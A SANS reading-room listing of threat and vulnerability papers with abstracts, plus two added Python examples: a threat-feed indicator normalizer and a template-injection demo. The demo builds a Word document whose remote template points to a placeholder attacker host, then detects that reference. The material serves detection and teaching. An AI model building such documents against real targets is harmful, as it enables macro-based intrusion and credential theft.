Threats/Vulnerabilities
Featuring 151 Papers as of January 20, 2021
-
Continuous Security Validation Against an Ever-Changing Landscape Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - January 20, 2021- Associated Webcasts: Continuous Security Validation Against an Ever-Changing Landscape
- Sponsored By: Cymulate
Waiting for an attack to test your security controls is not acceptable. In this SANS product review, Matt Bromiley examines Cymulate Continuous Security Validation, a highly integrated, customizable platform built around testing the security controls of your organization. Bromiley puts this platform to the test in terms of its ability to identify security risks, craft purple team assessments, pivot from intelligence reports to control testing, gain executive-level insight into assessments, and more.
-
SANS 2020 Threat Hunting Survey Results Analyst Paper (requires membership in SANS.org community)
by Mathias Fuchs and Joshua Lemon - December 13, 2020- Associated Webcasts: SANS 2020 Threat Hunting Survey Results; SANS 2020 Threat Hunting Survey: A Panel Discussion
- Sponsored By: Cisco Systems, Sophos Inc., Infoblox, Anomali, DomainTools, ThreatQuotient, Corelight, Swimlane, Analyst1, BlackBerry, Secureworks
According to past SANS surveys, many organizations aren't hunting for threats before they become incidents. This year's SANS Threat Hunting Survey looks at why that is and how security departments can reap the benefits of proactive hunting. For example: How do hunters conduct their searches for signs of a threat not yet detected by other security systems? Are they regularly checking on known threats targeting misconfigurations and other vulnerabilities? Do they find value in looking for totally unknown attack types?
-
20/20 Vision for Implementing a Security Operations Center Analyst Paper (requires membership in SANS.org community)
by Christopher Crowley - November 18, 2020- Associated Webcasts: 20/20 Vision for Implementing a Security Operations Center A SANS Whitepaper
- Sponsored By: Splunk, CrowdStrike, Inc., Vectra Networks Inc.
Organizations want to transform the Security Operations Center (SOC) with automation and orchestration. Threat intelligence needs to be ingested, defense expenditures need to be optimized based on attacker tactics and techniques, new technology needs to be implemented, cloud resources and other external resources are taking the place of traditional on-premises systems, and skilled staff are scarce. To accomplish this modernization alongside existing operations, a clear strategy for the capabilities and their implementation is needed. How will you develop this strategic vision? Most organizations will look to industry standards and reference implementations to determine a strategy before proceeding. This paper and webcast will help you explore what those models are. It identifies and discusses several models of what a SOC is; the relative merits and shortcomings of each are identified, and value propositions are offered. Your strategic outlook and your implementation will be substantially improved as a result.
-
Ransomware Prevention Special Report: How to Address a Pervasive and Unrelenting Threat Analyst Paper (requires membership in SANS.org community)
by Justin Henderson - November 17, 2020- Associated Webcasts: Ransomware Prevention Special Report: How to Address a Pervasive and Unrelenting Threat; Ransomware Prevention Panel Discussion: How to Address a Pervasive and Unrelenting Threat
- Sponsored By: Cisco Systems, LogRhythm, Gigamon, ExtraHop, BlackBerry, Cyberinc
Ransomware is a fast-growing threat affecting thousands of government agencies and municipalities, and it is now even targeting critical ICS/SCADA operations in order to halt them. This paper explains why and how ransomware is spreading, introduces standards and provides guidance for detecting and recovering from ransomware, based on US-CERT and NIST resources.
-
SANS Vulnerability Management Survey 2020 Analyst Paper (requires membership in SANS.org community)
by David Hazar - November 9, 2020- Associated Webcasts: SANS 2020 Vulnerability Management Survey; SANS 2020 Vulnerability Management Survey: A Panel Discussion
- Sponsored By: Qualys, Cisco Systems Inc., Anomali, ThreatConnect
The 2020 Vulnerability Management Survey focused on how organizations' vulnerability programs are evolving and maturing in response to changing technology, architecture and design. It also explored how organizations are identifying vulnerabilities in their applications and non-traditional infrastructure. Download this paper to learn who is responsible for treating or remediating discovered vulnerabilities, and how mature survey respondents feel they are at managing different types of vulnerabilities within different technology components, services and even third parties or partners.
-
Threat Intelligence Solutions: A SANS Review of Anomali ThreatStream Analyst Paper (requires membership in SANS.org community)
by TJ Banasik - November 2, 2020- Associated Webcasts: Threat Intelligence Solutions: A SANS Review of Anomali ThreatStream
- Sponsored By: Anomali
Cyber threat data from multiple sources overwhelms today's Security Operations Centers (SOCs) without a centralized method to aggregate it. Many organizations have immature threat intelligence programs that rely on select external threat feeds, which users struggle to analyze. A cyber threat intelligence program requires people, processes, and technology to process, exploit, and disseminate threat data. In this product review, SANS had the opportunity to review the Anomali ThreatStream® product, a threat intelligence platform providing a unified solution for collecting, curating, and disseminating threat intelligence. ThreatStream rationalizes multiple threat data sources into a single high-fidelity repository by automatically normalizing, de-duplicating, removing false positives, and enriching the threat data, then associating all related threat indicators. ThreatStream applies a machine learning algorithm for scoring indicators of compromise (IOCs).
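The normalize, de-duplicate and filter steps described above are where most home-grown feed aggregation goes wrong, so here is a worked example of them. This is added example code, not Anomali's or SANS's; the feed names, indicator values and the corroboration-count ranking are constructed for the example (the product uses enrichment and a learned scoring model in place of the simple ranking shown).

```python
"""Added example, not Anomali's or SANS's code: normalize, de-duplicate and
attribute indicators from several threat feeds before scoring them. The feed
contents, source names and the corroboration ranking are constructed for the
example; a product would add enrichment and a learned scoring model here."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample feeds. Feeds disagree on case, defanging and trailing
# dots, so naive string comparison would count the same indicator three times.
FEEDS = {
    "feed_a": ["Evil.Example.COM", "hxxp://bad[.]example[.]net/payload", "203.0.113.7"],
    "feed_b": ["evil.example.com.", "http://bad.example.net/payload", "192.168.1.20"],
    "feed_c": ["203[.]0[.]113[.]7", "10.0.0.5", "nonsense-with spaces", "EVIL.example.com"],
}

# Common defanging conventions, longest scheme first so hxxps is not mangled.
_DEFANG = [("hxxps://", "https://"), ("hxxp://", "http://"), ("[.]", "."),
           ("(.)", "."), ("[:]", ":"), ("[at]", "@")]

# Address space that is never a useful network indicator (RFC 1918, loopback,
# link-local, multicast). The documentation range 203.0.113.0/24 is deliberately
# not listed so the constructed samples survive the filter.
_NOISE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "224.0.0.0/4", "::1/128", "fe80::/10", "fc00::/7")]

_DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def refang(value):
    """Undo defanging so equivalent indicators compare equal."""
    v = value.strip()
    for defanged, clean in _DEFANG:
        v = v.replace(defanged, clean)
    return v


def classify(value):
    """Return (indicator_type, canonical_form) or None for unusable input."""
    v = refang(value)
    if "://" in v:
        scheme, rest = v.split("://", 1)
        host, _, path = rest.partition("/")
        return "url", f"{scheme.lower()}://{host.lower()}/{path}"
    v = v.lower().rstrip(".")
    try:
        return "ip", str(ipaddress.ip_address(v))
    except ValueError:
        pass
    if _DOMAIN_RE.match(v):
        return "domain", v
    return None


def is_noise_ip(canonical):
    """True for addresses that would only generate false positives."""
    addr = ipaddress.ip_address(canonical)
    return any(addr in net for net in _NOISE_NETS)


def aggregate(feeds):
    """Merge feeds into one dict keyed by canonical indicator, keeping every
    source and raw spelling; return (merged, rejected)."""
    merged = defaultdict(lambda: {"type": None, "sources": set(), "raw": set()})
    rejected = []
    for source, values in feeds.items():
        for raw in values:
            parsed = classify(raw)
            if parsed is None or (parsed[0] == "ip" and is_noise_ip(parsed[1])):
                rejected.append((source, raw))
                continue
            kind, canonical = parsed
            entry = merged[canonical]
            entry["type"] = kind
            entry["sources"].add(source)
            entry["raw"].add(raw)
    return dict(merged), rejected


def rank(merged):
    """Order indicators by corroboration (distinct sources), a constructed
    stand-in for a real scoring model."""
    return sorted(merged.items(), key=lambda item: (-len(item[1]["sources"]), item[0]))


if __name__ == "__main__":
    merged, rejected = aggregate(FEEDS)
    for canonical, entry in rank(merged):
        print(f"{entry['type']:7} {canonical:40} sources={sorted(entry['sources'])}")
    print("rejected:", rejected)
```

Two points worth checking in any feed pipeline: the defang table must be applied before any scheme or host comparison (otherwise `hxxp://` and `http://` copies of one URL are scored separately), and the private/loopback filter must not silently swallow the RFC 5737 documentation ranges if you use them in test data, as this example does.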
-
Detecting Malicious Activity in Large Enterprises Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - September 8, 2020- Associated Webcasts: Detecting Malicious Activity in Large Enterprises
- Sponsored By: Chronicle
As they grow, organizations need to detect threats amid an alarming assortment of unexpected and complex conditions, often with a blend of legacy and current technologies. This paper explores options for advanced threat detections at enterprise scale.
-
Intuitive Endpoint Security: A SANS Review of Morphisec Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - August 18, 2020- Associated Webcasts: Intuitive Endpoint Security: A SANS Review of Morphisec
- Sponsored By: Morphisec
Endpoint security can be a tricky topic for organizations. In many cases, security teams utilize endpoint security products that are bulky and cumbersome, barely effective, and only make their jobs more difficult. Furthermore, many security products rely so heavily on detecting an incident after the fact that they hardly seem effective in preventing cyber incidents. This leaves the security team constantly chasing alerts through the network rather than implementing preventative techniques. In this paper, SANS instructor Matt Bromiley reviews the Morphisec platform, which reverses much of this approach. Morphisec is geared toward the prevention of malicious activity through the careful morphing of process memory.
-
Browser Isolation: A SANS Review of Cyberinc's Isla Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - July 28, 2020- Associated Webcasts: Browser Isolation: A SANS Review of Cyberinc's Isla
- Sponsored By: Cyberinc
The browser is an integral part of users' day-to-day activities, providing access to internal resources, sensitive data and third-party services. Via the use of webmail and malicious links, it is also an integral piece of the entry vector for attackers. In this product review, Matt Bromiley reviews Cyberinc's Isla, a browser isolation platform that addresses this common incident entry vector by getting in front of browser-borne threats and effectively rendering them harmless.
-
Measuring and Improving Cyber Defense Using the MITRE ATT&CK Framework Analyst Paper (requires membership in SANS.org community)
by John Hubbard - July 17, 2020- Associated Webcasts: Measuring and Improving Cyber Defense Using the MITRE ATT&CK® Framework; Measuring and Improving Cyber Defense Using the MITRE ATT&CK® Framework: A SANS Panel Discussion; Understanding and Leveraging the MITRE ATT&CK® Framework: A SANS Roundtable
- Sponsored By: Cisco Systems Inc., LogRhythm, Infoblox, Anomali, Reversing Labs, ThreatQuotient, Swimlane, Awake Security, ExtraHop
Through the ATT&CK framework, MITRE has generated a gold mine of information about the most important tactics and techniques used by attackers and how the blue team can detect and prevent these actions. Blocking atomic attack indicators such as domain names and IP addresses might work in the short term, but understanding the higher-level tactics in ATT&CK helps the blue team identify and anticipate attacker activity at a higher level of abstraction. In this white paper, SANS author and dedicated blue team member John Hubbard explores how ATT&CK slows attackers down and gives defenders a fighting chance.
-
Making and Keeping Work-at-Home Operations Safe and Productive Analyst Paper (requires membership in SANS.org community)
by John Pescatore - July 8, 2020- Associated Webcasts: Making and Keeping Work at Home Operations Safe and Productive; Insights on Remote Access Cybersecurity and Workplace Flexibility - A SANS Whitepaper
- Sponsored By: Infoblox, Menlo Security, Pulse Secure, BlackBerry
Workforce mobility, endpoint security and data protection risks have amplified since the COVID-19 pandemic. Organizations have had to address a variety of remote worker challenges, including security teams working from home (WFH). While secure remote access capacity and cloud usage for business continuity have accelerated, businesses are now realizing productivity and operational advantages, projecting a shift toward increased remote workplace flexibility and permanence.
-
Responding to Incidents in Industrial Control Systems: Identifying Threats/Reactions and Developing the IR Process Analyst Paper (requires membership in SANS.org community)
by Don C. Weber - May 21, 2020- Associated Webcasts: Responding to Incidents in Industrial Control Systems (ICS): Identifying Threats, Reactions and Developing the IR Process
- Sponsored By: Honeywell International
Threats, attacks and incidents are not decreasing. Industrial control systems (ICS) have become increasingly vulnerable as cyber criminals discover that OT environments are viable targets. This paper outlines the incident response process in OT environments and provides examples of the pitfalls of being unprepared.
-
All Roads Lead to the Browser: A SANS Buyer's Guide to Browser Isolation Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - May 6, 2020- Associated Webcasts: All Roads Lead to the Browser: A SANS Buyer's Guide to Browser Isolation
- Sponsored By: Cyberinc
As organizations move to the cloud, browser dependency becomes more prevalent; that is why we say the browser is the new endpoint. By keeping web code from executing on the endpoint, browser isolation limits the impact a browser can have on a victim system. Find out how browser isolation works, the key factors to consider when evaluating, implementing and testing solutions, and how to integrate browser isolation into your security posture to stop attacks earlier.
-
SANS Top New Attacks and Threat Report Analyst Paper (requires membership in SANS.org community)
by John Pescatore - April 27, 2020- Associated Webcasts: SANS Top New Attacks and Threat Report
- Sponsored By: Cisco Systems, RSA, Unisys, Infoblox, Anomali, DomainTools, Verodin, Cyberinc
SANS instructors presented their analysis of new attack techniques currently in use and shared their projections for future exploits at the annual 2020 RSA Conference in San Francisco. In this paper, SANS Director of Emerging Security Trends John Pescatore highlights key themes from that report and other sources.
-
2020 SANS Cyber Threat Intelligence (CTI) Survey Analyst Paper (requires membership in SANS.org community)
by Robert M. Lee - February 10, 2020- Associated Webcasts: 2020 SANS Cyber Threat Intelligence (CTI) Survey Results; 2020 SANS Cyber Threat Intelligence (CTI) Survey Panel Discussion
- Sponsored By: Sophos Inc., Infoblox, Anomali, DomainTools, RecordedFuture, ThreatConnect, ThreatQuotient, EclecticIQ
Over the past several years, SANS has seen a gradual maturation of cyber threat intelligence (CTI) and its applications in information security. This paper, based on results from the 2020 SANS CTI Survey, provides guidance on how organizations of all types can get the most out of CTI.
-
Protecting the User: A Review of Mimecast's Web Security Service Analyst Paper (requires membership in SANS.org community)
by David Szili - December 11, 2019- Associated Webcasts: Protecting the User: A Review of Mimecast's Web Security Service
- Sponsored By: Mimecast Services Limited
The web remains a primary vector for cyberattacks, as either the initiation point or the way to complete the adversaries' mission. In this review, SANS instructor David Szili shares his perspectives on best practices for securing the web in general and his experience using the Mimecast Web Security cloud service in particular.
-
Exploring the Human Fingerprints on Malware by Tobias Johansson and Robert M. Lee - November 22, 2019
- Associated Webcasts: Human Fingerprints in Malware and their Use in Cyber Threat Intelligence
Much of the focus of cyber threat intelligence is countering adversaries and the tools and capabilities they leverage to harm target organizations. Malware is a popular choice for many adversaries to fulfill goals such as access development or destruction. Malware contains a wealth of information to analyze for the purpose of cyber threat intelligence. The development, operationalization and use of malware is performed by humans, and these human interactions leave traces: how the malware is leveraged, its configuration data, or even the choice of the malware itself. Malware is often not unique to specific adversaries, but these traces, identified in the paper simply as human fingerprints, can be useful in clustering intrusions into sets for structured analysis and for satisfying intelligence requirements. This is not a new concept, and many researchers take advantage of these practices today. The purpose of this paper is to introduce the concept to a wider audience and to structure it around the Diamond Model as a useful tool for analysis.
-
What Security Practitioners Really Do When It Comes to Security Testing Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - October 18, 2019- Associated Webcasts: Are Your Security Controls Yesterday's News?
- Sponsored By: Cymulate
Given the number, criticality and potential damage of attacks, how can you better protect your organization against the latest threats? And with so many solutions in your arsenal, how can you ensure that security controls are integrated seamlessly to defend you in the moment of truth against attacks? This paper, which is a follow-up to "Are Your Security Controls Yesterday’s News?," addresses issues with security effectiveness testing and how to improve control validation to shorten testing cycles, accelerate remediation and improve your organization's security posture--faster. It presents the results of a recent SANS poll to provide insight into how organizations are testing for security effectiveness and how performance is actually being measured. The paper also provides specific steps to help you optimize security in a more proactive, continuous way.
-
ExtraHop Reveal(x) Expands Attack Investigations to Cover All Vectors Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - September 30, 2019- Associated Webcasts: ExtraHop Reveal(x) Expands Attack Investigations to Cover All Vectors
- Sponsored By: ExtraHop
-
Effectively Addressing Advanced Threats Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - August 19, 2019- Sponsored By: IBM Security
As security professionals well know, the wave of advanced threats never stops, and organizations are increasingly challenged in dealing with the onslaught. But not all threats are created equal. How do you identify the most critical and deal with those? In this survey, we asked the security community to share what advanced threats their organizations are facing and how they're allocating resources and technology.
Register now for the associated webcast at 1 p.m. Eastern on Wednesday September 25, 2019: https://register.gotowebinar.com/register/6150616769136423937
-
Are Your Security Controls Yesterday's News? Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - July 18, 2019- Associated Webcasts: Are Your Security Controls Yesterday's News?
- Sponsored By: Cymulate
This spotlight paper, one of a two-part series, looks at just how successful an organization can expect to be if it's using old news, limited scope or "cookie-cutter" vulnerability scans as a way to assess its environment. SANS believes security control testing needs to improve significantly to emulate actual--not hypothetical--threats to an organization.
The second spotlight, "What Security Practitioners Really Do When It Comes to Security Testing," focuses on the input SANS received from a poll that gathered opinions from the SANS community on this topic.
-
How to Protect a Modern Web Application in AWS Analyst Paper (requires membership in SANS.org community)
by Shaun McCullough - May 9, 2019- Sponsored By: AWS Marketplace
In moving assets to the cloud, organizations need to prioritize their security plans based on the risks to which they are exposed. With threat modeling, organizations can identify and prioritize the risks to infrastructure, applications and the services they provide, as well as evaluate how to manage those risks over time. This paper includes use cases for threat modeling web apps and the DevSecOps platform, using a process that is both repeatable and improvable.
-
Why Your Vulnerability Management Strategy Is Not Working - and What to Do About It Analyst Paper (requires membership in SANS.org community)
by Jake Williams - April 23, 2019- Associated Webcasts: Why Your Vulnerability Management Strategy Is Not Working – and What to Do About It
- Sponsored By: Lookingglass Cyber Solutions, Inc.
This paper looks at why vulnerability management solutions have not met expectations and how IT and security teams can better implement those solutions to maximize value. It also addresses how to deal with the resourcing constraints that all vulnerability management programs encounter.
-
SANS Top New Attacks and Threat Report Analyst Paper (requires membership in SANS.org community)
by John Pescatore - April 18, 2019- Associated Webcasts: SANS Top New Attacks and Threat Report
- Sponsored By: Unisys, Infoblox, Veracode, Anomali, DomainTools
Each year, the annual RSA Conference features top SANS instructors presenting their look at the new attack techniques currently in use and their projections for future exploits. This whitepaper captures highlights from this year's fast-paced and informative panel discussion, including insight into overall cybersecurity trends on both the offensive and defensive sides as well as advice from SANS on the steps enterprises must take to meet future risks.
-
SANS Vulnerability Management Survey Analyst Paper (requires membership in SANS.org community)
by Andrew Laman - April 8, 2019- Associated Webcasts: Current State of Vulnerability Management: Part 1 of the SANS Vulnerability Management Survey Results; Vulnerability Practices of Tomorrow: Part 2 of the SANS Vulnerability Management Survey Results
- Sponsored By: Tenable, Veracode, Bromium, Balbix
More and more organizations are finding that they need more than scanning results to manage their vulnerabilities effectively. This SANS survey investigates how organizations are managing vulnerabilities across their endpoints, applications, cloud services and business partners, while providing insights about survey results related to risk-based vulnerability management practices, management of cloud-based vulnerabilities and more.
-
Understanding the Adversary with Deception Technology Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - February 26, 2019- Associated Webcasts: Improving Detection and Understanding the Adversary with Deception Technology
- Sponsored By: TrapX Security
Organizations are having great difficulties properly remediating incidents and eradicating attackers from their environment. This paper examines some of the challenges facing organizations in understanding the adversary, and presents some of the latest deception techniques that can be used to identify attacker activity (both known and unknown).
-
Cyber Threats to the Bioengineering Supply Chain SANS.edu Graduate Student Research
by Scott Nawrocki - February 12, 2019
Biotechnology and pharmaceutical companies rely on the sequencing of DNA to conduct research, develop new drug therapies, solve environmental challenges and study emerging infectious diseases. Synthetic biology combines biology and computer engineering disciplines to read, synthetically write and store DNA sequences utilizing bioinformatics applications. Bioengineers begin with a computerized genetic model and turn that model into a living cell (2011, Smolke). Genetic editing is making headlines as there are rumors that a genetically modified human, immune to HIV, was born in China. As the soil on our farms becomes depleted of nitrogen, genetic research is focusing on applications as a means to reintroduce nitrogen into the ground. Reliance on oil and pollution has paved the way for research into bio-fuels. Genomic research advances have outpaced the security of these applications and technology, which leaves them vulnerable to attack (2017, Ney). As information security professionals, we must keep pace with these advances. This research will demonstrate the stages of a network-based attack, recommend Critical Security Controls countermeasures and introduce the concept of a Bioengineering Systems Kill Chain.
-
The Evolution of Cyber Threat Intelligence (CTI): 2019 SANS CTI Survey Analyst Paper (requires membership in SANS.org community)
by Rebekah Brown and Robert M. Lee - February 4, 2019- Associated Webcasts: CTI Requirements and Inhibitors: Part 1 of the 2019 SANS Cyber Threat Intelligence Survey; CTI Tools, Usage and a Look Ahead: Part 2 of the 2019 SANS Cyber Threat Intelligence Survey
- Sponsored By: Anomali, DomainTools, RecordedFuture, ThreatQuotient, IntSights
In order to use cyber threat intelligence (CTI) effectively, organizations must know what intelligence to apply and where to get that intelligence. This paper delves into the results of the SANS 2019 Cyber Threat Intelligence Survey and explores the value of CTI, CTI requirements, how respondents are currently using CTI--and what the future holds.
-
Template Injection Attacks - Bypassing Security Controls by Living off the Land by Brian Wiltse - February 1, 2019
As adversary tactics continue to adapt and embrace the concept of living off the land, using legitimate company software instead of a virus or other malware (Rut15), their tactics, techniques and procedures (TTPs) often leverage programs and features in target environments that are normal and expected. The adversaries use these features in a way that enables them to bypass security controls and complete their objective. In May 2017, a suspected APT group began to leverage one such feature in Microsoft Office, using a Template Injection attack to harvest credentials or gain access to end users' computers at a US power plant operator, Wolf Creek Nuclear Operating Corp. In this Gold Paper, we review in detail what the Template Injection attacks may have looked like against this target, and assess their ability to bypass security controls.
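The Office feature the abstract refers to is the attached-template relationship: a .docx is a ZIP archive, and `word/_rels/settings.xml.rels` can declare an `attachedTemplate` relationship with `TargetMode="External"` whose target Word fetches when the document opens. The following is an added example, not code from the Gold Paper or from SANS: it builds a constructed document carrying such a reference and then scans documents for it. The host `attacker.example` and the file layout are placeholders constructed for the example.

```python
"""Added example, not code from the Gold Paper: build a constructed .docx in
memory that carries a remote template reference, then scan documents for that
indicator. Office Open XML files are ZIP archives; an attached template is
declared as a Relationship of type attachedTemplate in
word/_rels/settings.xml.rels, and a remote one has TargetMode="External" with
an http(s) or UNC target. The attacker host below is a constructed placeholder."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
ATTACHED_TEMPLATE = OFFICE_REL + "/attachedTemplate"


def build_docx(template_target=None):
    """Return the bytes of a minimal .docx. With template_target set, the file
    carries the settings relationship an injected document would carry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml",
                   f"<w:document xmlns:w='{WML_NS}'><w:body/></w:document>")
        if template_target is not None:
            # settings.xml names a relationship id; the .rels part resolves it
            z.writestr("word/settings.xml",
                       f"<w:settings xmlns:w='{WML_NS}' xmlns:r='{OFFICE_REL}'>"
                       "<w:attachedTemplate r:id='rId1'/></w:settings>")
            z.writestr("word/_rels/settings.xml.rels",
                       f"<Relationships xmlns='{REL_NS}'>"
                       f"<Relationship Id='rId1' Type='{ATTACHED_TEMPLATE}' "
                       f"Target='{template_target}' TargetMode='External'/>"
                       "</Relationships>")
    return buf.getvalue()


def attached_template_targets(docx_bytes):
    """List (part_name, target) for every external attachedTemplate
    relationship in any .rels part of the archive."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode") == "External"):
                    hits.append((name, rel.get("Target")))
    return hits


def is_remote(target):
    """A local Normal.dotm also uses an External relationship (file:// path);
    only network locations indicate template injection."""
    t = target.strip().lower()
    return t.startswith(("http://", "https://", "\\\\"))


def remote_template_targets(docx_bytes):
    """Targets that would make Word fetch a template over the network."""
    return [target for _, target in attached_template_targets(docx_bytes) if is_remote(target)]


if __name__ == "__main__":
    # Constructed attacker host; no real infrastructure is referenced.
    injected = build_docx("https://attacker.example/templates/normal.dotm")
    print("injected:", remote_template_targets(injected))
    benign = build_docx("file:///C:/Users/u/AppData/Roaming/Microsoft/Templates/Normal.dotm")
    print("benign:", remote_template_targets(benign))
```

Two caveats for anyone turning this into a mail-gateway or sandbox check: the scanner parses attacker-controlled XML, so in production use `defusedxml` rather than the stdlib parser, and a template reference is only one of several external relationship types (OLE objects, frames and hyperlinks also take `TargetMode="External"`), so a real scanner should enumerate all of them. The document itself contains no payload; the fetched `.dotm` carries the macros, so the outbound request in proxy logs is the second place to look.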
-
An Evaluator's Guide to NextGen SIEM Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - December 6, 2018- Associated Webcasts: An Evaluator's Guide to Next-Generation SIEM
- Sponsored By: LogRhythm
A traditional SIEM often lacks the capability to produce actionable information and has a limited shelf life. To be effective, a SIEM must stay relevant in the face of new threats and changes in an organization's technical and support infrastructures. Learn about the key questions to ask as you research adding a next-generation SIEM, one that captures data and generates information that security teams can use as intelligence to detect potentially malicious activity.
-
Integrating Threat Intelligence into Endpoint Security: A Review of CrowdStrike Falcon X Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - November 26, 2018- Associated Webcasts: Threat Intelligence and Protecting Your Endpoints: A SANS Review of the CrowdStrike Falcon X Platform
- Sponsored By: CrowdStrike, Inc.
While threat intelligence can transform an organization's security posture, it can be complex and costly for organizations to adopt and operationalize. With that in mind, SANS Analyst Dave Shackleford tested CrowdStrike Falcon X, which purportedly enables cybersecurity teams to automatically analyze malware found on endpoints, find related threats and enrich the results with customized threat intelligence. This review encapsulates his findings, and details how the solution can help SOC teams.
-
Automating Open Source Security: A SANS Review of WhiteSource Analyst Paper (requires membership in SANS.org community)
by Serge Borso - September 25, 2018- Associated Webcasts: Automating Open Source Security: A SANS Review of WhiteSource
- Sponsored By: WhiteSource
This paper takes a close look at how the WhiteSource solution can handle the myriad of open source vulnerabilities through real-time detection and remediation.
-
SANS 2018 Threat Hunting Survey Results Analyst Paper (requires membership in SANS.org community)
by Robert M. Lee and Rob T. Lee - September 18, 2018- Associated Webcasts: Threat Hunting Is a Process, Not a Thing: SANS 2018 Survey Results, Part I; Threat Hunting in Action: SANS 2018 Survey Results, Part II
- Sponsored By: Qualys, IBM, RiskIQ, Anomali, DomainTools, Malwarebytes
Our third survey on threat hunting looks at the maturity of hunting programs and where they are going, along with best practices being used in organizations to detect and remediate threats that would otherwise remain hidden. Read this report to learn how survey respondents answered questions that are immediately important to organizations conducting threat hunting.
-
A Guide to Managing Cloud Security Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - July 25, 2018- Associated Webcasts: Managing Cloud Security
- Sponsored By: Tenable
While many of the core concepts of vulnerability and threat management remain the same in the world of cloud deployments, we need to adapt our thinking to operate in a hybrid or public cloud deployment model. This paper will help you evaluate cloud vulnerabilities and threat management, and protect your data and assets in a dynamic cloud infrastructure.
-
Methods for the Controlled Deployment and Operation of a Virtual Patching Program SANS.edu Graduate Student Research
by William Vink - May 20, 2018
In today's rapidly changing IT environments, new vulnerabilities are identified at an increasing pace and attackers are becoming more sophisticated in their ability to exploit them. At the same time, systems have become more complex and are still used in conjunction with older technologies, which results in challenges in testing and deploying traditional patches.
-
10 Endpoint Security Problems Solved by the Cloud Analyst Paper (requires membership in SANS.org community)
by Deb Radcliff - May 4, 2018- Sponsored By: Carbon Black
SANS surveys and testimonials from IT and security professionals indicate that endpoint security is a challenge. There is too much complexity and cost, defenses aren't keeping up, and security staff is stretched thin. This infographic explores how cloud can help address these issues.
-
Managing User Risk: A Review of LogRhythm CloudAI for User and Entity Behavior Analytics Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 26, 2018- Associated Webcasts: Why Insider Actions Matter: SANS Review of LogRhythm CloudAI for User and Entity Behavior Analytics
- Sponsored By: LogRhythm
In this product review, we explored the recently released LogRhythm CloudAI, which applies user and entity behaviour analytics (UEBA) capabilities to enhance traditional event management and security analytics toolsets to monitor behaviors tracked over time, alerting analysts to unusual events or patterns of events.
-
CTI in Security Operations: SANS 2018 Cyber Threat Intelligence Survey Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 5, 2018- Associated Webcasts: Cyber Threat Intelligence Today: SANS CTI Survey Results, Part 1; Cyber Threat Intelligence Skills and Usefulness: SANS CTI Survey Results, Part 2
- Sponsored By: Rapid7 Inc., Anomali, DomainTools, ThreatConnect, IntSights
The survey focuses on how organizations could collect security intelligence data from a variety of sources, and then recognize and act upon indicators of attack and compromise scenarios in a timely manner. Although some CTI trends continued this year, we definitely saw several differences in a number of areas, which are noted in the research. From this year's results, it is obvious that CTI collection, integration and use within security teams are maturing.
-
SOC Automation-Deliverance or Disaster Analyst Paper (requires membership in SANS.org community)
by Eric Cole, PhD - December 11, 2017- Sponsored By: DFLabs
Learn how to strike a balance between security alerts that can be automated with minimal impact and the higher-risk alerts that need to be handled by analysts.
-
Security and Operations - An Overlooked But Necessary Partnership Analyst Paper (requires membership in SANS.org community)
by Sonny Sarai - December 4, 2017- Associated Webcasts: Security and Ops Hacks
- Sponsored By: Rapid7 Inc.
This paper explores ways to foster cooperation between Security and Operations groups for better visibility into threats and threat pathways, while improving overall protection and network hygiene.
-
Blueprint for CIS Control Application: Securing the Oracle E-Business Suite Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - October 26, 2017- Sponsored By: Onapsis
This paper looks at how the Critical Security Controls can be used to secure Oracle's E-Business Suite (EBS), using an approach that considers application- as well as network-related issues.
-
Targeted Attack Protection: A Review of Endgame’s Endpoint Security Platform Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - October 17, 2017- Associated Webcasts: Targeted Attack Protection: SANS Review of Endgame's endpoint security platform
- Sponsored By: Endgame
SANS Analyst Dave Shackleford presents his experience reviewing Endgame's Managed Detection and Response Services under real-world threats in a simulated environment.
-
Sensitive Data at Risk: The SANS 2017 Data Protection Survey Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - September 5, 2017
- Associated Webcasts: Sensitive Data Everywhere: Results of SANS 2017 Data Protection Survey
- Sponsored By: Mcafee LLC Infoblox
Ransomware, insider threat and denial of service are considered the top threats to sensitive data by respondents to the 2017 SANS Data Protection Survey. User credentials and privileged accounts represented the most common data types involved in these breaches reported in the survey, spotlighting the fact that access data is prized by attackers. The experiences of respondents with compromised data provide valuable lessons for security professionals.
-
2017 Threat Landscape Survey: Users on the Front Line Analyst Paper (requires membership in SANS.org community)
by Lee Neely - August 14, 2017
- Associated Webcasts: Security Whack-a-Mole: SANS 2017 Threat Landscape Survey
